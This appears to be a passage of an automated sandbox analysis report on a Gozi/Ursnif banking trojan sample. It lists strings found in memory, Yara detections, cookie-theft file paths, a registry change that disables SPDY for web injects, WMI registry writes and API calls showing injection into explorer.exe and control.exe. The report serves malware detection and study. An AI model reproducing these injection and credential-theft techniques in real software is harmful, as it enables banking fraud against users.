Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojan
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_01385ECA
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 0_2_01385ECA
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_01385ECA
Yara detected Ursnif
Source: Yara match File source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001C22 GetProcAddress,NtCreateSection,memset, 0_2_10001C22
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001AD1 NtMapViewOfSection, 0_2_10001AD1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001252 GetLastError,NtClose, 0_2_10001252
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100023C5 NtQueryVirtualMemory, 0_2_100023C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F86EF1 GetProcAddress,NtCreateSection,memset, 0_2_00F86EF1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F89DDB NtMapViewOfSection, 0_2_00F89DDB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F87925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_00F87925
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8B169 NtQueryVirtualMemory, 0_2_00F8B169
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_0138A027
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138E010 GetProcAddress,NtCreateSection,memset, 0_2_0138E010
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01397AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_01397AFF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01397579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 0_2_01397579
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139CD7A NtQueryInformationProcess, 0_2_0139CD7A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01389DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_01389DAC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01396CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_01396CBC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_0139AC94
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0138ACD5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A47A1 NtMapViewOfSection, 0_2_013A47A1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013837E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_013837E7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01387E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_01387E14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_013A298D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01387878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_01387878
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013940A7 memset,NtQueryInformationProcess, 0_2_013940A7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138AA15 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_0138AA15
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0139956E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013845FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_013845FF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01394C67 NtGetContextThread,RtlNtStatusToDosError, 0_2_01394C67
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01391606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_01391606
Source: C:\Windows\explorer.exe Code function: 32_2_04E01DF4 NtWriteVirtualMemory, 32_2_04E01DF4
Source: C:\Windows\explorer.exe Code function: 32_2_04DE7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 32_2_04DE7DA0
Source: C:\Windows\explorer.exe Code function: 32_2_04E046EC NtAllocateVirtualMemory, 32_2_04E046EC
Source: C:\Windows\explorer.exe Code function: 32_2_04DF3EF4 NtQuerySystemInformation, 32_2_04DF3EF4
Source: C:\Windows\explorer.exe Code function: 32_2_04DFF0D0 NtReadVirtualMemory, 32_2_04DFF0D0
Source: C:\Windows\explorer.exe Code function: 32_2_04DF1084 NtQueryInformationProcess, 32_2_04DF1084
Source: C:\Windows\explorer.exe Code function: 32_2_04DE69DC NtSetContextThread,NtUnmapViewOfSection,NtClose, 32_2_04DE69DC
Source: C:\Windows\explorer.exe Code function: 32_2_04E0D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 32_2_04E0D9EC
Source: C:\Windows\explorer.exe Code function: 32_2_04DEB980 NtMapViewOfSection, 32_2_04DEB980
Source: C:\Windows\explorer.exe Code function: 32_2_04DE1148 NtCreateSection, 32_2_04DE1148
Source: C:\Windows\explorer.exe Code function: 32_2_04E21003 NtProtectVirtualMemory,NtProtectVirtualMemory, 32_2_04E21003
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF40A4 NtQueryInformationProcess, 33_2_00AF40A4
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE1084 NtQueryInformationProcess, 33_2_00AE1084
Source: C:\Windows\System32\control.exe Code function: 33_2_00AEF0D0 NtReadVirtualMemory, 33_2_00AEF0D0
Source: C:\Windows\System32\control.exe Code function: 33_2_00ADB980 NtMapViewOfSection, 33_2_00ADB980
Source: C:\Windows\System32\control.exe Code function: 33_2_00AFD9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 33_2_00AFD9EC
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD69DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 33_2_00AD69DC
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD1148 NtCreateSection, 33_2_00AD1148
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 33_2_00AD7DA0
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF1DF4 NtWriteVirtualMemory, 33_2_00AF1DF4
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF46EC NtAllocateVirtualMemory, 33_2_00AF46EC
Source: C:\Windows\System32\control.exe Code function: 33_2_00B11003 NtProtectVirtualMemory,NtProtectVirtualMemory, 33_2_00B11003
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675761084 NtQueryInformationProcess, 36_2_0000020675761084
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067577D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 36_2_000002067577D9EC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675791003 NtProtectVirtualMemory,NtProtectVirtualMemory, 36_2_0000020675791003
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A1CB8 CreateProcessAsUserA, 0_2_013A1CB8
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100021A4 0_2_100021A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F840B3 0_2_00F840B3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8AF44 0_2_00F8AF44
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A7188 0_2_013A7188
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139D057 0_2_0139D057
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013948AD 0_2_013948AD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138D0DC 0_2_0138D0DC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138E384 0_2_0138E384
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01398BF3 0_2_01398BF3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013862FA 0_2_013862FA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139ED4B 0_2_0139ED4B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01384C03 0_2_01384C03
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139D7BD 0_2_0139D7BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A3EAF 0_2_013A3EAF
Source: C:\Windows\explorer.exe Code function: 32_2_04DEECE0 32_2_04DEECE0
Source: C:\Windows\explorer.exe Code function: 32_2_04E05428 32_2_04E05428
Source: C:\Windows\explorer.exe Code function: 32_2_04DEDF58 32_2_04DEDF58
Source: C:\Windows\explorer.exe Code function: 32_2_04E0A074 32_2_04E0A074
Source: C:\Windows\explorer.exe Code function: 32_2_04DFB814 32_2_04DFB814
Source: C:\Windows\explorer.exe Code function: 32_2_04DE69DC 32_2_04DE69DC
Source: C:\Windows\explorer.exe Code function: 32_2_04DEB9E8 32_2_04DEB9E8
Source: C:\Windows\explorer.exe Code function: 32_2_04DFD92C 32_2_04DFD92C
Source: C:\Windows\explorer.exe Code function: 32_2_04DEDA3C 32_2_04DEDA3C
Source: C:\Windows\explorer.exe Code function: 32_2_04DFAA28 32_2_04DFAA28
Source: C:\Windows\explorer.exe Code function: 32_2_04E093FC 32_2_04E093FC
Source: C:\Windows\explorer.exe Code function: 32_2_04E04B78 32_2_04E04B78
Source: C:\Windows\explorer.exe Code function: 32_2_04DEFCA0 32_2_04DEFCA0
Source: C:\Windows\explorer.exe Code function: 32_2_04DF1C0C 32_2_04DF1C0C
Source: C:\Windows\explorer.exe Code function: 32_2_04DE65D8 32_2_04DE65D8
Source: C:\Windows\explorer.exe Code function: 32_2_04DF75D8 32_2_04DF75D8
Source: C:\Windows\explorer.exe Code function: 32_2_04DF8DD0 32_2_04DF8DD0
Source: C:\Windows\explorer.exe Code function: 32_2_04DE5DA8 32_2_04DE5DA8
Source: C:\Windows\explorer.exe Code function: 32_2_04DF25A4 32_2_04DF25A4
Source: C:\Windows\explorer.exe Code function: 32_2_04E0C560 32_2_04E0C560
Source: C:\Windows\explorer.exe Code function: 32_2_04E07D44 32_2_04E07D44
Source: C:\Windows\explorer.exe Code function: 32_2_04DF6528 32_2_04DF6528
Source: C:\Windows\explorer.exe Code function: 32_2_04DE96D8 32_2_04DE96D8
Source: C:\Windows\explorer.exe Code function: 32_2_04DFCE90 32_2_04DFCE90
Source: C:\Windows\explorer.exe Code function: 32_2_04DE1600 32_2_04DE1600
Source: C:\Windows\explorer.exe Code function: 32_2_04E10614 32_2_04E10614
Source: C:\Windows\explorer.exe Code function: 32_2_04DFA0F0 32_2_04DFA0F0
Source: C:\Windows\explorer.exe Code function: 32_2_04DF9850 32_2_04DF9850
Source: C:\Windows\explorer.exe Code function: 32_2_04DF782C 32_2_04DF782C
Source: C:\Windows\explorer.exe Code function: 32_2_04DE49C4 32_2_04DE49C4
Source: C:\Windows\explorer.exe Code function: 32_2_04E019FC 32_2_04E019FC
Source: C:\Windows\explorer.exe Code function: 32_2_04E0A9FC 32_2_04E0A9FC
Source: C:\Windows\explorer.exe Code function: 32_2_04DF99F8 32_2_04DF99F8
Source: C:\Windows\explorer.exe Code function: 32_2_04DE596C 32_2_04DE596C
Source: C:\Windows\explorer.exe Code function: 32_2_04DEE2B0 32_2_04DEE2B0
Source: C:\Windows\explorer.exe Code function: 32_2_04E1027C 32_2_04E1027C
Source: C:\Windows\explorer.exe Code function: 32_2_04E0EA40 32_2_04E0EA40
Source: C:\Windows\explorer.exe Code function: 32_2_04E06250 32_2_04E06250
Source: C:\Windows\explorer.exe Code function: 32_2_04E0E220 32_2_04E0E220
Source: C:\Windows\explorer.exe Code function: 32_2_04DF7218 32_2_04DF7218
Source: C:\Windows\explorer.exe Code function: 32_2_04DE2A34 32_2_04DE2A34
Source: C:\Windows\explorer.exe Code function: 32_2_04DE9A34 32_2_04DE9A34
Source: C:\Windows\explorer.exe Code function: 32_2_04E003EC 32_2_04E003EC
Source: C:\Windows\explorer.exe Code function: 32_2_04E0A3B2 32_2_04E0A3B2
Source: C:\Windows\explorer.exe Code function: 32_2_04DE7B44 32_2_04DE7B44
Source: C:\Windows\explorer.exe Code function: 32_2_04DFB378 32_2_04DFB378
Source: C:\Windows\explorer.exe Code function: 32_2_04DF6B00 32_2_04DF6B00
Source: C:\Windows\explorer.exe Code function: 32_2_04E2138C 32_2_04E2138C
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD69DC 33_2_00AD69DC
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF4B78 33_2_00AF4B78
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF5428 33_2_00AF5428
Source: C:\Windows\System32\control.exe Code function: 33_2_00AEA0F0 33_2_00AEA0F0
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE782C 33_2_00AE782C
Source: C:\Windows\System32\control.exe Code function: 33_2_00AEB814 33_2_00AEB814
Source: C:\Windows\System32\control.exe Code function: 33_2_00AFA074 33_2_00AFA074
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE9850 33_2_00AE9850
Source: C:\Windows\System32\control.exe Code function: 33_2_00ADB9E8 33_2_00ADB9E8
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF19FC 33_2_00AF19FC
Source: C:\Windows\System32\control.exe Code function: 33_2_00AFA9FC 33_2_00AFA9FC
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE99F8 33_2_00AE99F8
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD49C4 33_2_00AD49C4
Source: C:\Windows\System32\control.exe Code function: 33_2_00AED92C 33_2_00AED92C
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD596C 33_2_00AD596C
Source: C:\Windows\System32\control.exe Code function: 33_2_00AEAA28 33_2_00AEAA28
Source: C:\Windows\System32\control.exe Code function: 33_2_00AFE220 33_2_00AFE220
Source: C:\Windows\System32\control.exe Code function: 33_2_00ADDA3C 33_2_00ADDA3C
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD2A34 33_2_00AD2A34
